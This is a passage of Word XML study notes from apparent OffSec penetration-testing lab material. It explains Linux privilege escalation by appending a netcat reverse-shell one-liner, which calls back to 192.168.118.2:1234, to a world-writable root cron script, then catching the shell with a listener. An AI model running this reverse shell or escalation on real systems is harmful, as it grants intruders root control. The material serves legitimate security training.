      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To leverage insecure file permissions, we must locate an executable file that not only allows us write access, but also runs at an elevated privilege level. On a Linux system, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId758">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId759">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cron</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> time-based job scheduler is a prime target, since system-level scheduled jobs are executed with root user privileges and system administrators often create scripts for cron jobs with insecure permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002453">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this example, we will SSH into the VM 1 as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">joe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, providing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a password. In a previous section, we demonstrated where to check the filesystem for installed cron jobs on a target system. We could also inspect the cron log file (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/cron.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) for running cron jobs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002454">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002455">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="401" name="image400.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image400.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76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2456">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1081"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep "CRON" /var/log/syslog</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002457">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002458">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It appears that a script called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user_backups.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> under </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/joe/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is executed in the context of the root user. Judging by the timestamps, it seems that this job runs once every minute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002459">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we know the location of the script, we can inspect its contents and permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000245A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000245B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1943100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="547" name="image528.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image528.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId761"/>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245C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /home/joe/.scripts/user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000245D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -lah /home/joe/.scripts/user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000245E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000245F">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The script itself is fairly straight-forward: it simply copies the user's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">home</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backups</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> subdirectory. The</w:t>
      </w:r>
      <w:hyperlink r:id="rId762">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId763">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">permissions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the script reveal that every local user can write to the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002460">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since an unprivileged user can modify the contents of the backup script, we can edit it and add a reverse shell</w:t>
      </w:r>
      <w:hyperlink r:id="rId764">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId765">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">one-liner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If our plan works, we should receive a root-level reverse shell on our attacking machine after, at most, a one-minute period.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002461">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002462">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2921000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="98" name="image93.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image93.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76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2463">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd .scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002464">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo &gt;&gt; user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002465">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We appended a blank line to make sure our reverse shell was written on a fresh line and not appended to an already existing line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002466">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.118.2 1234 &gt;/tmp/f" &gt;&gt; user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002467">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="475"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002468">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002469">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All we must do now is set up a listener on our Kali Linux machine and wait for the cron job to execute:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000246A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000246B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1828800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="530" name="image512.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image512.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76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246C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lnvp 1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000246D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000246E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000246F">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the previous listing, the cron job did execute, as well as the reverse shell one-liner. We have successfully elevated our privileges and have access to a root shell on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002470">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although this was a simple example, it is not uncommon to find similar situations in the field since administrators are often more focused on pushing systems into production rather than securing script file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002471">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002472">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_le2h7evnnrxl" w:id="322"/>
      <w:bookmarkEnd w:id="322"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replacing a file being run as root using bash (found via pspy64)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002473">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId768">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Flu</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474">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002475">
      <w:pPr>
        <w:ind w:left="-1170" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7128669" cy="1336625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="164" name="image158.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image158.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId769"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7128669" cy="1336625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002476">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We didn't look at cron jobs, but we did see this scheduled task that was running in pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002477">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1232"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The reason why we wanted to investigate this further is because we saw the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory which is a fan favorite for exploitation in offsec since it includes 3rd party non-standard files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002478">
      <w:pPr>
        <w:numPr>
